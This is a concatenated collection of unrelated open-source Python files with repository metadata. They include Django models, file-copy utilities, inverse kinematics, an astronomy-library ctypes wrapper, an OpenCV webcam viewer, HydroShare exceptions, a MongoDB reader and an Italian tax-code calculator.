text = models.TextField()
created_date = models.DateField(default=timezone.now)
published_date = models.DateField(blank=True, null=True)
def publish(self):
self.published_date = timezone.now()
self.save()
def __str__(self):
return self.title
| [
"jrr.snf@uea.edu.br"
] | jrr.snf@uea.edu.br |
5cef4935661c78552c53eed251192490799624ff | ecdda4ae6fd2846df17cd9b0d58bdb64c400644b | /Greeting.py | 97a6cb51c0f0945699c0dc2607a1fb203b041a70 | [] | no_license | Kawboy442/MyPython | 649be1adbf1c43dc6aea80b3d6de94f4907d142c | 35eb83689e5846406f467dcd04ccdf0a6f66aaf9 | refs/heads/master | 2022-12-09T04:15:52.008475 | 2020-08-30T03:19:39 | 2020-08-30T03:19:39 | 287,887,525 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 49 | py | x = 10
y = 2
z = 10
print(x == y)
print(x != z)
| [
"kawboy442@gmail.com"
] | kawboy442@gmail.com |
dc1da1c9ef73b27d7f9f46ca1946632acac00f72 | c2f88e323b6a83b8bacdc57cd133d6d6dbf4c3fe | /src/rendre/utils.py | 8307c0011aa4312502ccd79c0f156c5c7d03bdd6 | [] | no_license | claudioperez/rendre | 6a6ee9436da5e2e44d45d5c5c167cbe3c962697e | 7973742ce4c38735764c3a9babaa899a6521ca29 | refs/heads/master | 2023-05-31T20:14:35.111339 | 2021-06-19T04:16:45 | 2021-06-19T04:16:45 | 321,309,990 | 0 | 0 | null | 2021-02-11T16:18:16 | 2020-12-14T10:17:39 | Python | UTF-8 | Python | false | false | 7,994 | py | import re, os, sys, shutil
from pathlib import Path
import logging
from typing import List, Set
import coloredlogs
import yaml
logger = logging.getLogger(__name__)
coloredlogs.install()
class Error(OSError):
pass
def isrepository(url_string):
url_object = urllib.parse.urlparse(url_string)
url_path = Path(url_object.path)
if len(url_path.parts)==3:
return True
else:
return False
def get_resource_location(rsrc,config):
if "archive_location" in rsrc and "archive" in rsrc:
pass
else:
logger.error(f"{rsrc['id']}: insufficient archive info")
return
try:
if rsrc["archive"] in config.environ:
projdir = config.environ[rsrc["archive"]]
else:
projdir = os.environ.get(rsrc['archive'].replace('$',''))
except Exception as e:
logger.error(f"[{rsrc['id']}]: {e}")
return
return os.path.join(projdir,rsrc['archive_location'])
def copy_file(src,dst,dst_root=None,rules:Set[str]=None,*,follow_symlinks=True):
"""Based on shutil.copy2"""
if rules:
relpath = os.path.relpath(dst,dst_root)
logger.debug("relpath={}".format(relpath))
for rule in rules:
relpath = sed(rule,relpath)
logger.debug("new relpath={}".format(relpath))
if relpath:
dst = os.path.join(dst_root,relpath)
else:
return
if dst and os.path.isdir(dst):
dst = os.path.join(dst, os.path.basename(src))
shutil.copyfile(src,dst,follow_symlinks=follow_symlinks)
shutil.copystat(src, dst, follow_symlinks=follow_symlinks)
return dst
def _copytree(entries, src, dst, dst_root, rules, symlinks, ignore, copy_function,
ignore_dangling_symlinks, dirs_exist_ok=False):
if ignore is not None:
ignored_names = ignore(os.fspath(src), [x.name for x in entries])
else:
ignored_names = set()
if rules:
relpath = os.path.relpath(dst,dst_root)
logger.debug("relpath={}".format(relpath))
for rule in rules:
relpath = sed(rule,relpath)
logger.debug("new relpath={}".format(relpath))
if relpath:
dst = os.path.join(dst_root,relpath)
else:
return
os.makedirs(dst, exist_ok=dirs_exist_ok)
errors = []
use_srcentry = copy_function is copy_file or copy_function is shutil.copy
for srcentry in entries:
if srcentry.name in ignored_names:
continue
srcname = os.path.join(src, srcentry.name)
dstname = os.path.join(dst, srcentry.name)
##########################################################################
if rules:
relpath = os.path.relpath(dst,dst_root)
logger.debug("relpath={}".format(relpath))
for rule in rules:
relpath = sed(rule,relpath)
logger.debug("new relpath={}".format(relpath))
if relpath:
dst = os.path.join(dst_root,relpath)
else:
return
##########################################################################
srcobj = srcentry if use_srcentry else srcname
try:
is_symlink = srcentry.is_symlink()
if is_symlink and os.name == 'nt':
# Special check for directory junctions, which appear as
# symlinks but we want to recurse.
lstat = srcentry.stat(follow_symlinks=False)
if lstat.st_reparse_tag == stat.IO_REPARSE_TAG_MOUNT_POINT:
is_symlink = False
if is_symlink:
linkto = os.readlink(srcname)
if symlinks:
# We can't just leave it to `copy_function` because legacy
# code with a custom `copy_function` may rely on copytree
# doing the right thing.
os.symlink(linkto, dstname)
shutil.copystat(srcobj, dstname, follow_symlinks=not symlinks)
else:
# ignore dangling symlink if the flag is on
if not os.path.exists(linkto) and ignore_dangling_symlinks:
continue
# otherwise let the copy occur. copy2 will raise an error
if srcentry.is_dir():
copy_tree(srcobj, dstname, dst_root, rules, symlinks, ignore,
copy_function, dirs_exist_ok=dirs_exist_ok)
else:
copy_function(srcobj, dstname, dst_root, rules)
elif srcentry.is_dir():
copy_tree(srcobj, dstname, dst_root, rules, symlinks, ignore, copy_function,
dirs_exist_ok=dirs_exist_ok)
else:
# Will raise a SpecialFileError for unsupported file types
copy_function(srcobj, dstname, dst_root, rules)
# catch the Error from the recursive copytree so that we can
# continue with other files
except Error as err:
errors.extend(err.args[0])
except OSError as why:
errors.append((srcname, dstname, str(why)))
try:
shutil.copystat(src, dst)
except OSError as why:
# Copying file access times may fail on Windows
if getattr(why, 'winerror', None) is None:
errors.append((src, dst, str(why)))
if errors:
raise Error(errors)
return dst
def copy_tree(src, dst, dst_root=None, rules:Set[str]=None,symlinks=False, ignore=None, copy_function=copy_file,
ignore_dangling_symlinks=False, dirs_exist_ok=True):
"""Recursively copy a directory tree and return the destination directory.
dirs_exist_ok dictates whether to raise an exception in case dst or any
missing parent directory already exists.
If exception(s) occur, an Error is raised with a list of reasons.
If the optional symlinks flag is true, symbolic links in the
source tree result in symbolic links in the destination tree; if
it is false, the contents of the files pointed to by symbolic
links are copied. If the file pointed by the symlink doesn't
exist, an exception will be added in the list of errors raised in
an Error exception at the end of the copy process.
You can set the optional ignore_dangling_symlinks flag to true if you
want to silence this exception. Notice that this has no effect on
platforms that don't support os.symlink.
The optional ignore argument is a callable. If given, it
is called with the `src` parameter, which is the directory
being visited by copy_tree(), and `names` which is the list of
`src` contents, as returned by os.listdir():
callable(src, names) -> ignored_names
Since copy_tree() is called recursively, the callable will be
called once for each directory that is copied. It returns a
list of names relative to the `src` directory that should
not be copied.
The optional copy_function argument is a callable that will be used
to copy each file. It will be called with the source path and the
destination path as arguments. By default, copy2() is used, but any
function that supports the same signature (like copy()) can be used.
"""
sys.audit("shutil.copytree", src, dst)
with os.scandir(src) as itr:
entries = list(itr)
if dst:
return _copytree(entries=entries, src=src, dst=dst, dst_root=dst_root, rules=rules, symlinks=symlinks,
ignore=ignore, copy_function=copy_function,
ignore_dangling_symlinks=ignore_dangling_symlinks,
dirs_exist_ok=dirs_exist_ok)
| [
"50180406+claudioperez@users.noreply.github.com"
] | 50180406+claudioperez@users.noreply.github.com |
b9779c1b99685242bc97b9e16a2a2a14fe35eb1a | ddfba4105540ff51a1e29fbbeaf8042003310bfa | /jacobianIKE.py | 67d272ae3ceaaba65d156a4d60ea5ea6e091f676 | [] | no_license | edroderick/ECE590-midterm2 | ea0283fc19340c9e439a4c93c49d01914e858c39 | df0cb411c89dfd01fbc9a5105403be483bceab33 | refs/heads/master | 2021-01-19T11:12:11.437212 | 2014-11-20T03:54:08 | 2014-11-20T03:54:08 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 1,834 | py | #!/usr/bin/env python
import math
import numpy as np
from numpy.linalg import inv
def jacobianIKE(xg,yg):
threshold = .001
alpha = .1
dt1 = .001
dt2 = .001
dt3 = .001
t1 = 0.001
t2 = 0.001
t3 = 0.001
l1 = .3
l2 = .2
l3 = .1
e = 1
while (e > threshold):
#compute current position
x = l1*math.cos(t1)+l2*math.cos(t1+t2)+l3*math.cos(t1+t2+t3)
y = l1*math.sin(t1)+l2*math.sin(t1+t2)+l3*math.sin(t1+t2+t3)
e = math.sqrt((xg - x)**2+(yg - y)**2)
#compute error by advancing by dt values and subtracting from goal position
eX = l1*math.cos(t1+dt1)+l2*math.cos(t1+dt1+t2+dt2)+l3*math.cos(t1+dt1+t2+dt2+t3+dt3) - xg
eY = l1*math.sin(t1+dt1)+l2*math.sin(t1+dt1+t2+dt2)+l3*math.sin(t1+dt1+t2+dt2+t3+dt3) - yg
dE = np.array([[eX],[eY]])
#compute jacobian
dxt1 = l1*math.cos(t1+dt1)+l2*math.cos(t1+dt1+t2)+l3*math.cos(t1+dt1+t2+t3) - x
dyt1 = l1*math.sin(t1+dt1)+l2*math.sin(t1+dt1+t2)+l3*math.sin(t1+dt1+t2+t3) - y
dxt2 = l1*math.cos(t1)+l2*math.cos(t1+t2+dt2)+l3*math.cos(t1+t2+dt2+t3) - x
dyt2 = l1*math.sin(t1)+l2*math.sin(t1+t2+dt2)+l3*math.sin(t1+t2+dt2+t3) - y
dxt3 = l1*math.cos(t1)+l2*math.cos(t1+t2)+l3*math.cos(t1+t2+t3+dt3) - x
dyt3 = l1*math.sin(t1)+l2*math.sin(t1+t2)+l3*math.sin(t1+t2+t3+dt3) - y
J = np.array([[dxt1/dt1, dxt2/dt2, dxt3/dt3],[dyt1/dt1, dyt2/dt2, dyt3/dt3]])
Jplus = inv(J.T.dot(J)).dot(J.T)
dTheta = Jplus.dot(dE)
#calculate new joint angles
t1 = t1 - dTheta[0,0]*alpha
t2 = t2 - dTheta[1,0]*alpha
t3 = t3 - dTheta[2,0]*alpha
print 'x= ', x, ' y= ', y
return
jacobianIKE(.1,.1)
print '**BREAK**'
jacobianIKE(.2,.2)
print '**BREAK**'
jacobianIKE(.3,.3)
print '**BREAK**'
jacobianIKE(0.0,.3)
print '**BREAK**'
jacobianIKE(-.1, .1)
print '**BREAK**'
jacobianIKE(-.2, .2)
print '**BREAK**'
jacobianIKE(.3, -.2)
#jacobianIKE(.3,.8)
| [
"roderickvt@gmail.com"
] | roderickvt@gmail.com |
be41ce397c4e941352db90b3dc624fd17cdb6f4a | 43c129b6b9fbea67a23e034a469f7f2374fb2bf0 | /slalib.py | 92160a3e452a4622caf2efec6aece4e8b405d846 | [] | no_license | controlmanagement/modules | 5b0bd70fccaaa501eee094b80bda84111ab7b091 | d7d06f2e21458d877b02730c2928f7704c85e056 | refs/heads/master | 2021-01-24T06:18:05.892214 | 2017-10-26T11:07:11 | 2017-10-26T11:07:11 | 35,397,815 | 0 | 3 | null | 2017-10-24T04:31:31 | 2015-05-11T02:31:20 | Python | UTF-8 | Python | false | false | 6,035 | py | import math
import ctypes
import lib_slalib as lib
class slalib_controller(object):
_P = ctypes.POINTER
_char_p = ctypes.c_char_p
_uchar = ctypes.c_ubyte
_uchar_p = _P(ctypes.c_ubyte)
_ushort = ctypes.c_ushort
_ushort_p = _P(ctypes.c_ushort)
_int = ctypes.c_int
_int_p = _P(ctypes.c_int)
_uint = ctypes.c_uint
_long = ctypes.c_long
_long_p = _P(ctypes.c_long)
_ulong = ctypes.c_ulong
_ulong_p = _P(ctypes.c_ulong)
_float = ctypes.c_float
_float_p = _P(ctypes.c_float)
_double = ctypes.c_double
_double_p = _P(ctypes.c_double)
_void_p = ctypes.c_void_p
def slaDcc2s(self, v):
"""
slaDcc2s
"""
ra = dec = self._double_p(self._int(0))
vc= self._double*6
v = vc(*v)
lib.slaDcc2s(v, ra, dec)
return [ra.value, dec.value]
def slaDranrm(self, ra):
"""
slaDranrm
"""
ra = self._double(ra)
ra = lib.slaDranrm(ra)
return ra.value
def slaDcs2c(self, ra, dec):
"""
slaDcs2c
"""
ra = self._double(ra)
dec = self._double(dec)
v = self._double_p*3
data = [0]*3
v = v(*data)
lib.slaDcs2c(ra, dec, v)
return v
def slaPrec(self, begin_epoch, end_epoch):
"""
slaPrec
"""
begin_epoch = self._double(begin_epoch)
end_epoch = self._double(end_epoch)
rmat = [[0,0,0],[0,0,0],[0,0,0]]
rmat = self._double(rmat)
lib.slaPrc(begin_epoch, end_epoch, rmat)
return rmat
def slaEpj(self, jd):
"""
slaEpj
"""
jd = self._double(jd)
je = lib.slaEpj(jd)
return je.value
def slaDmxv(self, dm, va):
"""
slaDmxv
"""
dum0 =dum1 = dum2 = c_va = vb = self._double*3
data0 = data1 = data2 = []
data0 = dm[0]
data1 = dm[1]
data2 = dm[2]
dum0 = dum0(*data0)
dum1 = dum1(*data1)
dum2 = dum2(*data2)
dum = [dum0,dum1,dum2] #doubtful??
va = c_va(*va)
data = [0]*3
vb = vb(*data)
lib.slaDmxv(dum, va, vb)
return vb
def slaGmst(self, ut1):
"""
slaGmst
"""
ut1 = self._double(ut1)
st = lib.slaGmst(ut1)
return st.value
def slaPvobs(self, latitude, height, stl):
"""
slaPvobs
"""
latitude = self._double(latitude)
height = self._double(height)
stl = self._double(stl)
pv6 = self._double*6
data = [0]*6
pv6 = pv6(*data)
lib.slaPvobs(latitude, height, stl, pv6)
return pv6
def slaPreces(self, FK, ep0, ep1, ra, dec):
"""
slaPreces
"""
FK = self._uchar_p(FK)
ep0 = self._double(ep0)
ep1 = self._double(ep1)
ra = self._double_p(self._float(ra))
dec = self._double_p(self._float(dec))
lib.slaPreces(FK, ep0, ep1, ra, dec)
return [ra.value, dec.value]
def slaNutc(self, date):
"""
slaNutc
"""
date = self._double(date)
long = obliq = eps0 = self._double_p(self._int(0))
lib.slaNutc(date, long, obliq, eps0)
return [long.value, obliq.value, eps0.value]
def slaFk425(self, r1950, d1950, dr1950, dd1950, p1950, v1950):
"""
slaFk425
"""
r1950 = self._double(r1950)
d1950 = self._double(d1950)
dr1950 = self._double(dr1950)
dd1950 = self._double(dd1950)
p1950 = self._double(p1950)
v1950 = self._double(v1950)
r2000 = d2000 = dr2000 = dd2000 = p2000 = v2000 = self._double_p(self._int(0))
lib.slaFk425(r1950, d1950, dr1950, dd1950, p1950, v1950, r2000, d2000, dr2000, dd2000, p2000, v2000)
return [r2000.value, d2000.value, dr2000.value, dd2000.value, p2000.value, v2000.value]
def slaGaleq(self, long, lati):
"""
slaGaleq
"""
long = self._double(long)
lati = self._double(lati)
ra = dec = self._double_p(self._int(0))
lib.slaGaleq(long, lati, ra, dec)
return [ra.value, dec.value]
def slaMap(self, m_ra, m_dec, p_ra, p_dec, px, rv, eq, date):
"""
slaMap
"""
m_ra = self._double(m_ra)
m_dec = self._double(m_dec)
p_ra = self._doube(p_dec)
px = self._double(px)
rv = self._double(rv)
eq = self._double(eq)
date = self._double(date)
ap_ra = ap_dec = self._double_p(self._int(0))
lib.slaMap(m_ra, m_dec, p_ra, p_dec, px, rv, eq, date, ap_ra, ap_dec)
return [ap_ra.value, ap_dec.value]
def slaAop(self, g_ra, g_dec, mjd, dut, m_long, m_lati, height, xp, yp, temp, pressure, humid, w_length, tlr):
"""
slaAop
"""
g_ra = self._double(g_ra)
g_dec = self._double(g_dec)
mjd = self._double(mjd)
dut = self._double(dut)
m_long = self._double(m_long)
m_lati = self._double(m_lati)
height = self._double(height)
xp = self._double(xp)
yp = self._double(yp)
temp = self._double(temp)
pressure = self._double(pressure)
humid = self._double(humid)
w_length = self._double(w_length)
tlr = self._double(tlr)
az = el = ha = dec = ra = self._double_p(self._int(0))
lib.slaAop(g_ra, g_dec, mjd, dut, m_long, m_lati, height, xp, yp, temp, pressure, humid, w_length, tlr, az, el, ha, dec, ra)
return [az.value, el.value, ha.value, ra.value, dec.value]
def slaMappa(self, eq, tdb):
"""
slaMappa
"""
eq = self._double(eq)
tdb = self._double(tdb)
amprms = self._double*21
date = [0]*21
amprms = amprms(*date)
lib.slaMappa(eq, mjd_tdb, amprms)
return amprms
def slaAoppa(self, mjd_utc, dut, long, lat, alt, xp, yp, tmp, p, hu, wl, tlr):
"""
slaAoppa
"""
mjd_utc = self._double(mjd_utc)
dut = self._double(dut)
long = self,_double(long)
lat = self._doubel(lat)
alt = self._double(alt)
xp = sele._double(xp)
yp = self._double(yp)
tmp = self._double(tmp)
p = self._double(p)
hu = self._double(hu)
wl = self._double(wl)
tlr = self._double(tlr)
aoprms = self._double_p*14
date = [0]*14
aoprms = aoprms(*date)
lib.slaAoppa(mjd_utc, dut, long, lat, alt, xp, yp, tmp, p, hu, wl, tlr, aoprms)
return aoprms
def slaOapqk(self, type, ob1, ob2, aoprms):
"""
slaOapqk
"""
type = self._char_p(type)
ob1 = self._double(ob1)
ob2 = self._double(ob2)
ra = dec = self._double_p(self._int(0))
lib.slaOapqk(type, ob1, ob2, aoprms, ra, dec)
return [ra.value, dec.value]
def slaAmpqk(self, ra, dec, amprms):
"""
slaAmpqk
"""
ra = self._double(ra)
dec = self._double(dec)
m_ra = m_dec = self._double_p(self._int(0))
lib.slaAmpqk(ra, dec, amprms, m_ra, m_dec)
return [m_ra.value, m_dec.value]
| [
"h.iwamura@a.phys.nagoya-u.ac.jp"
] | h.iwamura@a.phys.nagoya-u.ac.jp |
b1477d2207442ee22314b5403a9f972bfc5de20e | d4f8a0fb7b76df5416467e6ead4756738a663e97 | /images_videos_webcam.py | ad42009e98e1b5f65519df5a5aafc40d48f6de72 | [] | no_license | cocomon173/OpenCV | 237faa2cc597fa255c0853ed7c9bcde918770690 | e4a6b3ec5a6013144d066bdcac095e8ecb1993f5 | refs/heads/master | 2022-11-11T17:22:31.525489 | 2020-07-04T09:44:44 | 2020-07-04T09:44:44 | 277,077,297 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 575 | py | import cv2
#
# cap = cv2.VideoCapture("Resources/파이썬 강의.mp4")
#while True:
# success, img = cap.read()
# cv2.imshow("Video",img)
# if cv2.waitKey(1) & 0xFF == ord('q'):
# break
import cv2
cap = cv2.VideoCapture(0) #비디오 객체
while True: # 계속 카메라로 불러오기 무한루프
ret,img_color = cap.read() #이미지 가쳐오기
if ret == False:
continue
cv2.imshow("color", img_color) #보이기
if cv2.waitKey(1)&0xFF == 27: #esc입력?
break # 끝내기
cap.release()
cv2.destroyAllWindows() | [
"cocomon173@gmail.com"
] | cocomon173@gmail.com |
7992c9ad590227ee1005fd6bf76442c50c6a898a | be13894bbd0c29a7e5ac191e098075acb83441e0 | /hs_restclient/exceptions.py | 5ba0ac2e32b4e41cf72bfe9104e96b128b80bced | [] | no_license | amabdallah/hs_restclient | 785bd237048df383818c41686de15b21ed5c3881 | ad2cc1d36c5331d79c9f93e3f06b484afaee9d06 | refs/heads/master | 2020-03-30T18:04:24.773757 | 2018-09-24T20:42:53 | 2018-09-24T20:42:53 | 151,482,242 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 2,880 | py | from .compat import http_responses
class HydroShareException(Exception):
def __init__(self, args):
super(HydroShareException, self).__init__(args)
class HydroShareArgumentException(HydroShareException):
def __init__(self, args):
super(HydroShareArgumentException, self).__init__(args)
class HydroShareBagNotReadyException(HydroShareException):
def __init__(self, args):
super(HydroShareBagNotReadyException, self).__init__(args)
class HydroShareNotAuthorized(HydroShareException):
def __init__(self, args):
super(HydroShareNotAuthorized, self).__init__(args)
self.method = args[0]
self.url = args[1]
def __str__(self):
msg = "Not authorized to perform {method} on {url}."
return msg.format(method=self.method, url=self.url)
def __unicode__(self):
return unicode(str(self))
class HydroShareNotFound(HydroShareException):
def __init__(self, args):
super(HydroShareNotFound, self).__init__(args)
self.pid = args[0]
if len(args) >= 2:
self.filename = args[1]
else:
self.filename = None
def __str__(self):
if self.filename:
msg = "File '{filename}' was not found in resource '{pid}'."
msg = msg.format(filename=self.filename, pid=self.pid)
else:
msg = "Resource '{pid}' was not found."
msg = msg.format(pid=self.pid)
return msg
def __unicode__(self):
return unicode(str(self))
class HydroShareHTTPException(HydroShareException):
""" Exception used to communicate HTTP errors from HydroShare server
Arguments in tuple passed to constructor must be: (url, status_code, params).
url and status_code are of type string, while the optional params argument
should be a dict.
"""
def __init__(self, args):
super(HydroShareHTTPException, self).__init__(args)
self.url = args[0]
self.method = args[1]
self.status_code = args[2]
if len(args) >= 4:
self.params = args[3]
else:
self.params = None
def __str__(self):
msg = "Received status {status_code} {status_msg} when accessing {url} " + \
"with method {method} and params {params}."
return msg.format(status_code=self.status_code,
status_msg=http_responses[self.status_code],
url=self.url,
method=self.method,
params=self.params)
def __unicode__(self):
return unicode(str(self))
class HydroShareAuthenticationException(HydroShareException):
def __init__(self, args):
super(HydroShareArgumentException, self).__init__(args)
| [
"henderson.mark@gmail.com"
] | henderson.mark@gmail.com |
2b5e564d6ab41882c760581c6c2064fb3dff0a89 | dfd42e01e5eec2a49d4ca6e8d83c528a0502d5c0 | /manage.py | e4b8c67c35d4523f463b5d610eef01577b04a3f1 | [] | no_license | andber6/myFirstDjangoProject | ba04d4794159b2717d1c1359e2e30ebe4fb05f8c | 60fb1a5f1706fd8a8fb11191886da92323e40654 | refs/heads/master | 2023-08-10T19:26:12.598266 | 2020-10-23T06:52:41 | 2020-10-23T06:52:41 | 304,015,358 | 0 | 0 | null | 2021-09-22T19:38:50 | 2020-10-14T12:57:10 | HTML | UTF-8 | Python | false | false | 667 | py | #!/usr/bin/env python
"""Django's command-line utility for administrative tasks."""
import os
import sys
def main():
"""Run administrative tasks."""
os.environ.setdefault('DJANGO_SETTINGS_MODULE', 'msp4_django.settings')
try:
from django.core.management import execute_from_command_line
except ImportError as exc:
raise ImportError(
"Couldn't import Django. Are you sure it's installed and "
"available on your PYTHONPATH environment variable? Did you "
"forget to activate a virtual environment?"
) from exc
execute_from_command_line(sys.argv)
if __name__ == '__main__':
main()
| [
"andre.bergan99@hotmail.com"
] | andre.bergan99@hotmail.com |
e43879a27c810b6df0e94eaeb7fada5fea81300f | c96e4f48bdbcee827a7b3a47324d1ab09389834e | /app/models.py | 8d399b54798772c25052d62acce77d052f4721f2 | [] | no_license | renzhixin/flasky | c39f60cb7832e73f718d2853eba359d8ac854ad4 | 6e920d2f9174e9b4cb9666f649a90b18bf6bce6b | refs/heads/main | 2023-03-27T15:03:52.108453 | 2021-03-17T14:35:33 | 2021-03-17T14:35:33 | 347,313,229 | 1 | 0 | null | null | null | null | UTF-8 | Python | false | false | 2,659 | py | from werkzeug.security import generate_password_hash, check_password_hash
from app import db
from flask_login import UserMixin
from . import login_manager # login_manager是在app.init文件中定义
from itsdangerous import TimedJSONWebSignatureSerializer as Serializer
from flask import current_app
@login_manager.user_loader
def load_user(user_id):
"""
login manager.user loader装饰器把这个函数注册给Flask-Login,在这个扩展在需要获取已登录用户的信息时调用。
缺少这个函数注册则Flask-login无法获取我们当前的用户
"""
return User.query.get(int(user_id))
class Role(db.Model):
__tablename__ = 'roles'
id = db.Column(db.Integer, primary_key=True)
name = db.Column(db.String(64), unique=True)
users = db.relationship('User', backref='role')
def __repr__(self):
return '<Role %r>' % self.name
class User(UserMixin, db.Model):
__tablename__ = 'users'
id = db.Column(db.Integer, primary_key=True)
email = db.Column(db.String(64), unique=True, index=True)
username = db.Column(db.String(64), unique=True, index=True)
role_id = db.Column(db.Integer, db.ForeignKey('roles.id'))
password_hash = db.Column(db.String(128))
confirmed = db.Column(db.Boolean, default=False)
@property
def password(self):
raise AttributeError('password is not a Readable attribute')
@password.setter
def password(self, password):
self.password_hash = generate_password_hash(password)
def verify_password(self, password):
return check_password_hash(self.password_hash, password)
def generate_confirmation_token(self, expiration=3600):
"""
生成邮箱认证的令牌
:param expiration: 令牌过期时间,默认3600秒
:return: dumps()方法为指定的数据生成一个加密签名,然后再对数据和签名进行序列化,生成令牌字符串。
"""
s = Serializer(current_app.config['SECRET_KEY'], expiration)
return s.dumps({'confirm': self.id}).decode('utf-8')
def confrim(self, token):
"""
确认令牌的有效性
:param token: 用户通过hhtps请求带来的令牌字符串
:return: 返回令牌是否有效
"""
s = Serializer(current_app.config['SECRET_KEY'])
try:
data = s.loads(token.encode('utf-8'))
except:
return False
if data.get('confirm') != self.id:
return False
self.confrimed = True
db.session.add(self)
return True
def __repr__(self):
return '<Role %r>' % self.username | [
"xtrenzhixin@163.com"
] | xtrenzhixin@163.com |
8ea9c38aeddfab4bb77ef6565f76af102d5a3c3c | 926feaf07b7b961ab9efce962cb5764d7894e56a | /service/mongodb.py | 7cdbeca08670f1f35c8672ee8537baae62043f51 | [
"Apache-2.0"
] | permissive | ga-hegsvold/mongodb-source | ac804218c87b5ba4b7c6276037cc510899ed1e3b | 1c81f4f751323817944a98f1425ca3735667cf4d | refs/heads/master | 2023-05-29T18:57:22.751083 | 2019-08-12T13:19:56 | 2019-08-12T13:19:56 | 133,238,613 | 0 | 1 | Apache-2.0 | 2023-05-01T21:26:40 | 2018-05-13T13:17:27 | Python | UTF-8 | Python | false | false | 2,005 | py | import pymongo
import datetime
import json
from bson import ObjectId
from datetime import datetime
import os
import logging
# 2017-03-16T10:15:15.677000Z
DATETIME_FORMAT = '%Y-%m-%dT%H:%M:%S.%fZ'
# set logging
log_level = logging.getLevelName(os.environ.get('LOG_LEVEL', 'INFO')) # default log level = INFO
logging.basicConfig(level=log_level) # dump log to stdout
# encode MongoDB BSON as JSON
class JSONEncoder(json.JSONEncoder):
def default(self, o):
if isinstance(o, ObjectId):
return str(o)
if isinstance(o, datetime):
return str(o.strftime(DATETIME_FORMAT))
return json.JSONEncoder.default(self, o)
class MongoDB(object):
def __init__(self, uri, database):
self._client = pymongo.MongoClient(uri)
self._db = self._client[database]
self._result = []
def __get_all_entities(self, collection):
for entity in self._db[collection].find():
json_string = JSONEncoder().encode(entity)
# decode JSON entity before appending to result list
self._result.append(json.loads(json_string))
return self._result
def __get_all_entities_since(self, collection, since):
dt = datetime.strptime(since, DATETIME_FORMAT)
logging.debug('parsed date: %s' % repr(dt))
# FIXME: property to match 'since' varies from source to source
for entity in self._db[collection].find({'lastModified': {'$gt': dt}}):
json_string = JSONEncoder().encode(entity)
# decode JSON entity before appending to result list
self._result.append(json.loads(json_string))
return self._result
def get_entities(self, collection, since=None):
if since is None:
logging.debug('getting all entities')
return self.__get_all_entities(collection)
else:
logging.debug('getting entities since %s' % since)
return self.__get_all_entities_since(collection, since)
| [
"geir.hegsvold@sesam.io"
] | geir.hegsvold@sesam.io |
88db90c935b2eb4f151a341b7420f38c5bbfeb67 | ffd68c0eb5eb3ef9c81ef68c940c29b3e4fa9cd7 | /codice_fiscale/codicefiscale.py | 09e7701e0d8e8fbdd877dfd356e73c311acdef43 | [] | no_license | ricpol/python_exercises | 794706e5c3ed4372e64ef4d7373608e01886c8a4 | eb5d7d9a121ff2372f4d1ee0d9e15f3f23471208 | refs/heads/master | 2016-09-06T03:11:15.519312 | 2012-04-02T11:20:32 | 2012-04-02T11:20:32 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 6,241 | py | # -*- coding: utf-8 -*-
"""
Calcolo del codice fiscale italiano a partire dai dati anagrafici.
Vedi http://it.wikipedia.org/wiki/Codice_fiscale per ulteriori informazioni.
Vedi http://it.wikipedia.org/wiki/Omocodia per limitazioni all'uso di questo
codice.
Questo modulo contiene il motore di calcolo.
"""
from datetime import date
class InvalidDataError(Exception): pass
# tavola di conversione per vocali accentate e altri segni strani
# TODO aggiungerne? Ma bisogna essere sicuri che si "traducono" davvero cosi'
segni_normalizzati = dict(zip(
(ord(i) for i in u"ÀÁÂÃÄÅÈÉÊËÌÍÎÏÒÓÔÕÖÙÚÛÜÇ´"),
(ord(i) for i in u"AAAAAAEEEEIIIIOOOOOUUUUC'")))
# tavole di eliminazione per vocali e consonanti,
# compresi spazio e apostrofo per nomi doppi e 'nobili'
vocali = {ord(i):None for i in u" 'AEIOU"}
consonanti = {ord(i):None for i in u" 'BCDFGHJKLMNPQRSTVWXYZ"}
def codice_cognome(cognome):
"""Le prime tre lettere del codice, relative al cognome.
@type cognome: unicode"""
cognome = cognome.upper().translate(segni_normalizzati)
cons = cognome.translate(vocali)
vocs = cognome.translate(consonanti)
return (cons + vocs)[:3].ljust(3, u'X')
def codice_nome(nome):
"""Le seconde tre lettere del codice, relative al nome.
@type nome: unicode"""
nome = nome.upper().translate(segni_normalizzati)
cons = nome.translate(vocali)
vocs = nome.translate(consonanti)
try:
return ''.join((cons[0], cons[2], cons[3]))
except IndexError:
return (cons + vocs)[:3].ljust(3, u'X')
mesi = '_ABCDEHLMPRST' # a ogni mese la sua lettera (piu' lo zero che non c'e')
def codice_nascita(data, sesso):
"""Le lettere dalla settima all'undicesima, per la data di nascita.
@param data: data di nascita
@type data: datetime.date
@param sesso: sesso ('M' o 'm' per maschile; tutto il resto e' interpretato
come femminile)
"""
mod = 0 if sesso in 'Mm' else 40
g = str(data.day+mod).zfill(2)
m = mesi[data.month]
a = str(data.year)[-2:]
return a + m + g
def codice_geografia(stato, provincia, comune, db):
"""Le lettere dalla dodicesima alla quindicesima, per il luogo di nascita.
@param db: un callable che restituisce il codice (pescandolo da un db
o altro storage). La signature del callable deve essere
db(stato, provincia, comune).
"""
return db(stato, provincia, comune)
alfabeto = 'ABCDEFGHIJKLMNOPQRSTUVWXYZ'
# codici di controllo: per le lettere pari (prima posizione) e dispari (seconda)
controllo = {'0':(0, 1), '1':(1, 0), '2':(2, 5), '3':(3, 7),
'4':(4, 9), '5':(5, 13), '6':(6, 15), '7':(7, 17),
'8':(8, 19), '9':(9, 21),
'A':(0, 1), 'B':(1, 0), 'C':(2, 5), 'D':(3, 7),
'E':(4, 9), 'F':(5, 13), 'G':(6, 15), 'H':(7, 17),
'I':(8, 19), 'J':(9, 21), 'K':(10, 2), 'L':(11, 4),
'M':(12, 18), 'N':(13, 20), 'O':(14, 11), 'P':(15, 3),
'Q':(16, 6), 'R':(17, 8), 'S':(18, 12), 'T':(19, 14),
'U':(20, 16), 'V':(21, 10), 'W':(22, 22), 'X':(23, 25),
'Y':(24, 24), 'Z':(25, 23)}
def codice_controllo(codice):
"""La sedicesima e ultima lettera, codice di controllo.
Solleva InvalidDataError se l'input contiene caratteri non ammessi. """
try:
resto = sum([controllo[i][(n+1)%2] for n, i in enumerate(codice)])%26
except KeyError:
raise InvalidDataError, 'caratteri non validi in input'
